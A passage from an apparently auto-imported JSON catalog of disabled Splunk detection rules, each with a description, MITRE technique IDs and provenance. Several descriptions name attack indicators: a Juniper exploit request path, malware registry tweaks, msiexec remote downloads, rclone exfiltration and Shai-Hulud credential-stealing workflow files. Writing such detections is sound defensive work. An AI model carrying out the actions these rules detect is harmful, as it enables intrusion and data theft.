analysis. Identifying group information on an endpoint is not inherently malicious but can be suspicious based on context such as time, endpoint, and user. This activity is significant as it may indicate reconnaissance efforts by an attacker. If confirmed malicious, it could lead to further enumeration and potential lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-wmiobject-group-discovery-with-script-block-logging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69df7f7c-155d-11ec-a055-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_wmiobject_group_discovery_with_script_block_logging.yml" } }, { "id": "splunk-security-content-69e2860c-0e4b-40ae-9dc4-bf9e3bf2a548", "type": "detection", "name": "Crowdstrike Privilege Escalation For Non-Admin User", "description": "The following analytic detects CrowdStrike alerts for privilege escalation attempts by non-admin users. These alerts indicate unauthorized efforts by regular users to gain elevated permissions, posing a significant security risk. Detecting and addressing these attempts promptly helps prevent potential breaches and ensures that user privileges remain properly managed, maintaining the integrity of the organization's security protocols.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-privilege-escalation-for-non-admin-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69e2860c-0e4b-40ae-9dc4-bf9e3bf2a548", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_privilege_escalation_for_non_admin_user.yml" } }, { "id": "splunk-security-content-6a12fa9f-580d-4627-8c7f-313e359bdc6a", "type": "detection", "name": "Windows Modify Registry No Auto Reboot With Logon User", "description": "The following analytic detects a suspicious modification to the Windows registry that disables automatic reboot with a logged-on user. This detection leverages the Endpoint data model to identify changes to the registry path `SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU\\NoAutoRebootWithLoggedOnUsers` with a value of `0x00000001`. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to evade detection and maintain persistence. If confirmed malicious, this could allow attackers to bypass security measures and deploy additional payloads without interruption.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-no-auto-reboot-with-logon-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a12fa9f-580d-4627-8c7f-313e359bdc6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_no_auto_reboot_with_logon_user.yml" } }, { "id": "splunk-security-content-6a168ce8-9a39-4492-9416-a67abdc56c53", "type": "detection", "name": "MCP Postgres Suspicious Query", "description": "This detection identifies potentially malicious SQL queries executed through MCP PostgreSQL server connections, monitoring for privilege escalation attempts, credential theft, and schema reconnaissance. These patterns are commonly observed in SQL injection attacks, compromised application credentials, and insider threat scenarios targeting database assets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-postgres-suspicious-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a168ce8-9a39-4492-9416-a67abdc56c53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_postgres_suspicious_query.yml" } }, { "id": "splunk-security-content-6a1b6cbe-6612-44c3-92b9-1a1bd77412eb", "type": "detection", "name": "Windows Defender ASR Registry Modification", "description": "The following analytic detects modifications to Windows Defender Attack Surface Reduction (ASR) registry settings. It leverages Windows Defender Operational logs, specifically EventCode 5007, to identify changes in ASR rules. This activity is significant because ASR rules are designed to block actions commonly used by malware to exploit systems. Unauthorized modifications to these settings could indicate an attempt to weaken system defenses. If confirmed malicious, this could allow an attacker to bypass security measures, leading to potential system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-defender-asr-registry-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a1b6cbe-6612-44c3-92b9-1a1bd77412eb", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_defender_asr_registry_modification.yml" } }, { "id": "splunk-security-content-6a80300a-9f8a-4f22-bd3e-09ca577cfdfc", "type": "detection", "name": "Windows Privilege Escalation Suspicious Process Elevation", "description": "The following analytic detects when a process running with low or medium integrity from a user account spawns an elevated process with high or system integrity in suspicious locations.\nThis behavior is identified using process execution data from Windows process monitoring.\nThis activity is significant as it may indicate a threat actor successfully elevating privileges, which is a common tactic in advanced attacks.\nIf confirmed malicious, this could allow the attacker to execute code with higher privileges, potentially leading to full system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1068", "T1548", "T1134" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-privilege-escalation-suspicious-process-elevation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6a80300a-9f8a-4f22-bd3e-09ca577cfdfc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_privilege_escalation_suspicious_process_elevation.yml" } }, { "id": "splunk-security-content-6aa49ff2-3c92-4586-83e0-d83eb693dfda", "type": "detection", "name": "Windows MSIExec Remote Download", "description": "The following analytic detects the use of msiexec.exe with an HTTP or\nHTTPS URL in the command line, indicating a remote file download attempt. This detection\nleverages data from Endpoint Detection and Response (EDR) agents, focusing on process\nexecution logs that include command-line details. This activity is significant as\nit may indicate an attempt to download and execute potentially malicious software\nfrom a remote server. If confirmed malicious, this could lead to unauthorized code\nexecution, system compromise, or further malware deployment within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-msiexec-remote-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6aa49ff2-3c92-4586-83e0-d83eb693dfda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_msiexec_remote_download.yml" } }, { "id": "splunk-security-content-6aa6f9dd-adfe-45a8-8f74-c4c7a0d7d037", "type": "detection", "name": "Active Directory Lateral Movement Identified", "description": "The following analytic identifies potential lateral movement activities within an organization's Active Directory (AD) environment. It detects this activity by correlating multiple analytics from the Active Directory Lateral Movement analytic story within a specified time frame. This is significant for a SOC as lateral movement is a common tactic used by attackers to expand their access within a network, posing a substantial risk. If confirmed malicious, this activity could allow attackers to escalate privileges, access sensitive information, and persist within the environment, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1210" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/active-directory-lateral-movement-identified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6aa6f9dd-adfe-45a8-8f74-c4c7a0d7d037", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/active_directory_lateral_movement_identified.yml" } }, { "id": "splunk-security-content-6ad6b548-adfa-452c-aa77-9ff94877e832", "type": "detection", "name": "Zoom High Video Latency", "description": "Detects particularly high latency from Zoom logs. Latency observed from threat actors performing Remote Employment Fraud (REF) is typically well above what\u2019s normal for the majority of employees.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zoom-high-video-latency.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ad6b548-adfa-452c-aa77-9ff94877e832", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/zoom_high_video_latency.yml" } }, { "id": "splunk-security-content-6ae0148e-9215-11eb-a94a-acde48001122", "type": "detection", "name": "Disabling ControlPanel", "description": "The following analytic detects registry modifications that disable the Control Panel on Windows systems. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path \"*\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel\" with a value of \"0x00000001\". This activity is significant as it is commonly used by malware to prevent users from accessing the Control Panel, thereby hindering the removal of malicious artifacts and persistence mechanisms. If confirmed malicious, this could allow attackers to maintain control over the infected machine and prevent remediation efforts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-controlpanel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ae0148e-9215-11eb-a94a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_controlpanel.yml" } }, { "id": "splunk-security-content-6b0cb0ff-9a7e-4475-a687-43827fdb31d6", "type": "detection", "name": "Linux Auditd Auditd Daemon Start", "description": "The following analytic detects the (re)initialization of the Linux audit daemon (auditd) by identifying log entries of type DAEMON_START. This event indicates that the audit subsystem has resumed logging after being stopped or has started during system boot. While DAEMON_START may be expected during reboots or legitimate configuration changes, it can also signal attempts to re-enable audit logging after evasion, or restarts with modified or reduced rule sets. Monitoring this event in correlation with DAEMON_END, DAEMON_ABORT, and auditctl activity provides visibility into the continuity and integrity of audit logs. Frequent or unexplained DAEMON_START events should be investigated, especially if they are not accompanied by valid administrative or system activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-daemon-start.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b0cb0ff-9a7e-4475-a687-43827fdb31d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_daemon_start.yml" } }, { "id": "splunk-security-content-6b1b84c4-3834-4dee-b062-9b79bdb31d15", "type": "detection", "name": "Windows Process Execution From RDP Share", "description": "The following analytic identifies process executions originating from RDP shares on Windows endpoints.\nRemote Desktop Protocol (RDP) shares, typically accessed via the \"tsclient\" path, allow users to share files between their local machine and a remote desktop session. However, threat actors may exploit RDP shares to execute malicious processes or transfer harmful files onto a compromised system.\nThis detection focuses on identifying any process executions that originate from RDP shares, which could indicate unauthorized access or malicious activity.\nSecurity teams should investigate any instances of such process executions, especially if they are found on systems that should not be using RDP shares or if the executed processes are unfamiliar or suspicious.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001", "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-execution-from-rdp-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b1b84c4-3834-4dee-b062-9b79bdb31d15", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_execution_from_rdp_share.yml" } }, { "id": "splunk-security-content-6b4a0a7f-10d1-4d72-9c4c-5c6a3d9f9d6a", "type": "detection", "name": "Shai-Hulud Workflow File Creation or Modification", "description": "Detects creation or deletion of malicious GitHub Actions workflow files associated with\nShai-Hulud worm variants on Linux or Windows endpoints. This includes the original shai-hulud-workflow.yml,\nthe 2.0 backdoor discussion.yaml (enables command injection via GitHub Discussions on self-hosted\nrunners named SHA1HULUD), and the secrets exfiltration workflow formatter_*.yml pattern. These\nfiles are used to exfiltrate credentials and propagate across repositories.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.006", "T1554", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/shai-hulud-workflow-file-creation-or-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b4a0a7f-10d1-4d72-9c4c-5c6a3d9f9d6a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/shai_hulud_workflow_file_creation_or_modification.yml" } }, { "id": "splunk-security-content-6b521149-b91c-43aa-ba97-c2cac59ec830", "type": "detection", "name": "Windows AD Privileged Account SID History Addition", "description": "The following analytic identifies when the SID of a privileged user is added to the SID History attribute of another user. It leverages Windows Security Event Codes 4742 and 4738, combined with identity lookups, to detect this activity. This behavior is significant as it may indicate an attempt to abuse SID history for unauthorized access across multiple domains. If confirmed malicious, this activity could allow an attacker to escalate privileges or maintain persistent access within the environment, posing a significant security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-privileged-account-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b521149-b91c-43aa-ba97-c2cac59ec830", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_privileged_account_sid_history_addition.yml" } }, { "id": "splunk-security-content-6b74d578-a02e-4e94-a0d1-39440d0bf254", "type": "detection", "name": "Detect Regsvcs with No Command Line Arguments", "description": "The following analytic detects instances of regsvcs.exe running without command line arguments. This behavior typically indicates process injection, where another process manipulates regsvcs.exe. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, IDs, and command-line executions. This activity is significant as it may signal an attempt to evade detection and execute malicious code. If confirmed malicious, the attacker could achieve code execution, potentially leading to privilege escalation, persistence, or access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvcs-with-no-command-line-arguments.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b74d578-a02e-4e94-a0d1-39440d0bf254", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml" } }, { "id": "splunk-security-content-6b813efd-8859-406f-b677-719458387fac", "type": "detection", "name": "Cisco Duo Policy Allow Tampered Devices", "description": "The following analytic detects when a Duo policy is created or updated to allow tampered or rooted devices, such as jailbroken smartphones,\nto access protected resources. It identifies this behavior by searching Duo administrator activity logs for policy changes where the allow_rooted_devices\nsetting is enabled. This is accomplished by filtering for policy creation or update actions and parsing the policy description for the relevant configuration.\nAllowing tampered devices poses a significant security risk, as these devices may bypass built-in security controls, run unauthorized software, or be more\nsusceptible to compromise. For a Security Operations Center (SOC), identifying such policy changes is critical because it may indicate either a\nmisconfiguration or a malicious attempt to weaken authentication requirements, potentially enabling attackers to access sensitive systems with\ncompromised devices. The impact of this attack can include unauthorized access, data breaches, and lateral movement within the environment,\nmaking prompt detection and response essential to maintaining organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-duo-policy-allow-tampered-devices.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6b813efd-8859-406f-b677-719458387fac", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_duo_policy_allow_tampered_devices.yml" } }, { "id": "splunk-security-content-6c077f81-2a83-4537-afbc-0e62e3215d55", "type": "detection", "name": "Linux Indicator Removal Service File Deletion", "description": "The following analytic detects the deletion of Linux service unit configuration files by suspicious processes. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on processes executing the 'rm' command targeting '.service' files. This activity is significant as it may indicate malware attempting to disable critical services or security products, a common defense evasion tactic. If confirmed malicious, this behavior could lead to service disruption, security tool incapacitation, or complete system compromise, severely impacting the integrity and availability of the affected Linux host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-indicator-removal-service-file-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c077f81-2a83-4537-afbc-0e62e3215d55", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_indicator_removal_service_file_deletion.yml" } }, { "id": "splunk-security-content-6c135f8d-5e60-454e-80b7-c56eed739833", "type": "detection", "name": "RunDLL Loading DLL By Ordinal", "description": "The following analytic detects rundll32.exe loading a DLL export function by ordinal value. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command-line executions. This behavior is significant because adversaries may use rundll32.exe to execute malicious code while evading security tools that do not monitor this process. If confirmed malicious, this activity could allow attackers to execute arbitrary code, potentially leading to system compromise, privilege escalation, or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rundll-loading-dll-by-ordinal.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c135f8d-5e60-454e-80b7-c56eed739833", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rundll_loading_dll_by_ordinal.yml" } }, { "id": "splunk-security-content-6c382336-22b8-4023-9b80-1689e799f21f", "type": "detection", "name": "O365 File Permissioned Application Consent Granted by User", "description": "The following analytic identifies instances where a user in the Office 365 environment grants consent to an application requesting file permissions for OneDrive or SharePoint. It leverages O365 audit logs, focusing on OAuth application consent events. This activity is significant because granting such permissions can allow applications to access, modify, or delete files, posing a risk if the application is malicious or overly permissive. If confirmed malicious, this could lead to data breaches, data loss, or unauthorized data manipulation, necessitating immediate investigation to validate the application's legitimacy and assess potential risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-file-permissioned-application-consent-granted-by-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6c382336-22b8-4023-9b80-1689e799f21f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_file_permissioned_application_consent_granted_by_user.yml" } }, { "id": "splunk-security-content-6ca919db-52f3-4c95-a4e9-7b189e8a043d", "type": "detection", "name": "O365 SharePoint Suspicious Search Behavior", "description": "The following analytic identifies when Office 365 users search for suspicious keywords or have an excessive number of queries to a SharePoint site within a limited timeframe. This behavior may indicate that a malicious actor has gained control of a user account and is conducting discovery or enumeration activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1213.002", "T1552" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-sharepoint-suspicious-search-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6ca919db-52f3-4c95-a4e9-7b189e8a043d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_sharepoint_suspicious_search_behavior.yml" } }, { "id": "splunk-security-content-6cb9d0e1-eabe-41de-a11a-5efade354e9d", "type": "detection", "name": "Linux Auditd Auditd Service Stop", "description": "The following analytic detects the suspicious auditd service stop. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-auditd-service-stop.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6cb9d0e1-eabe-41de-a11a-5efade354e9d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_auditd_service_stop.yml" } }, { "id": "splunk-security-content-6cc4cc3d-b10a-4fac-be1e-55d384fc690e", "type": "detection", "name": "Juniper Networks Remote Code Execution Exploit Detection", "description": "The following analytic detects attempts to exploit a remote code execution vulnerability in Juniper Networks devices. It identifies requests to /webauth_operation.php?PHPRC=*, which are indicative of uploading and executing malicious PHP files. This detection leverages the Web data model, focusing on specific URL patterns and HTTP status codes. This activity is significant because it signals an attempt to gain unauthorized access and execute arbitrary code on the device. If confirmed malicious, the attacker could gain control over the device, leading to data theft, network compromise, or other severe consequences.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1105", "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/juniper-networks-remote-code-execution-exploit-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6cc4cc3d-b10a-4fac-be1e-55d384fc690e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/juniper_networks_remote_code_execution_exploit_detection.yml" } }, { "id": "splunk-security-content-6d663014-fe92-11eb-ab07-acde48001122", "type": "detection", "name": "GSuite Email Suspicious Attachment", "description": "The following analytic detects suspicious attachment file extensions in GSuite emails, potentially indicating a spear-phishing attack. It leverages GSuite Gmail logs to identify emails with attachments having file extensions commonly associated with malware, such as .exe, .bat, and .js. This activity is significant as these file types are often used to deliver malicious payloads, posing a risk of compromising targeted machines. If confirmed malicious, this could lead to unauthorized code execution, data breaches, or further network infiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/gsuite-email-suspicious-attachment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6d663014-fe92-11eb-ab07-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/gsuite_email_suspicious_attachment.yml" } }, { "id": "splunk-security-content-6d70780d-4cfe-4820-bafd-1b43941986b5", "type": "detection", "name": "Windows Powershell Logoff User via Quser", "description": "The following analytic detects the process of logging off a user through the use of the quser and logoff commands. By monitoring for these commands, the analytic identifies actions where a user session is forcibly terminated, which could be part of an administrative task or a potentially unauthorized access attempt. This detection helps identify potential misuse or malicious activity where a user\u2019s access is revoked without proper authorization, providing insight into potential security incidents involving account management or session manipulation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1531" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-logoff-user-via-quser.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6d70780d-4cfe-4820-bafd-1b43941986b5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_logoff_user_via_quser.yml" } }, { "id": "splunk-security-content-6dca1124-b3ec-11eb-9328-acde48001122", "type": "detection", "name": "Detect Renamed RClone", "description": "The following analytic detects the execution of a renamed `rclone.exe` process, which is commonly used for data exfiltration to remote destinations. This detection leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and original file names that do not match. This activity is significant because ransomware groups often use RClone to exfiltrate sensitive data. If confirmed malicious, this behavior could indicate an ongoing data exfiltration attempt, potentially leading to significant data loss and further compromise of the affected systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1020" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 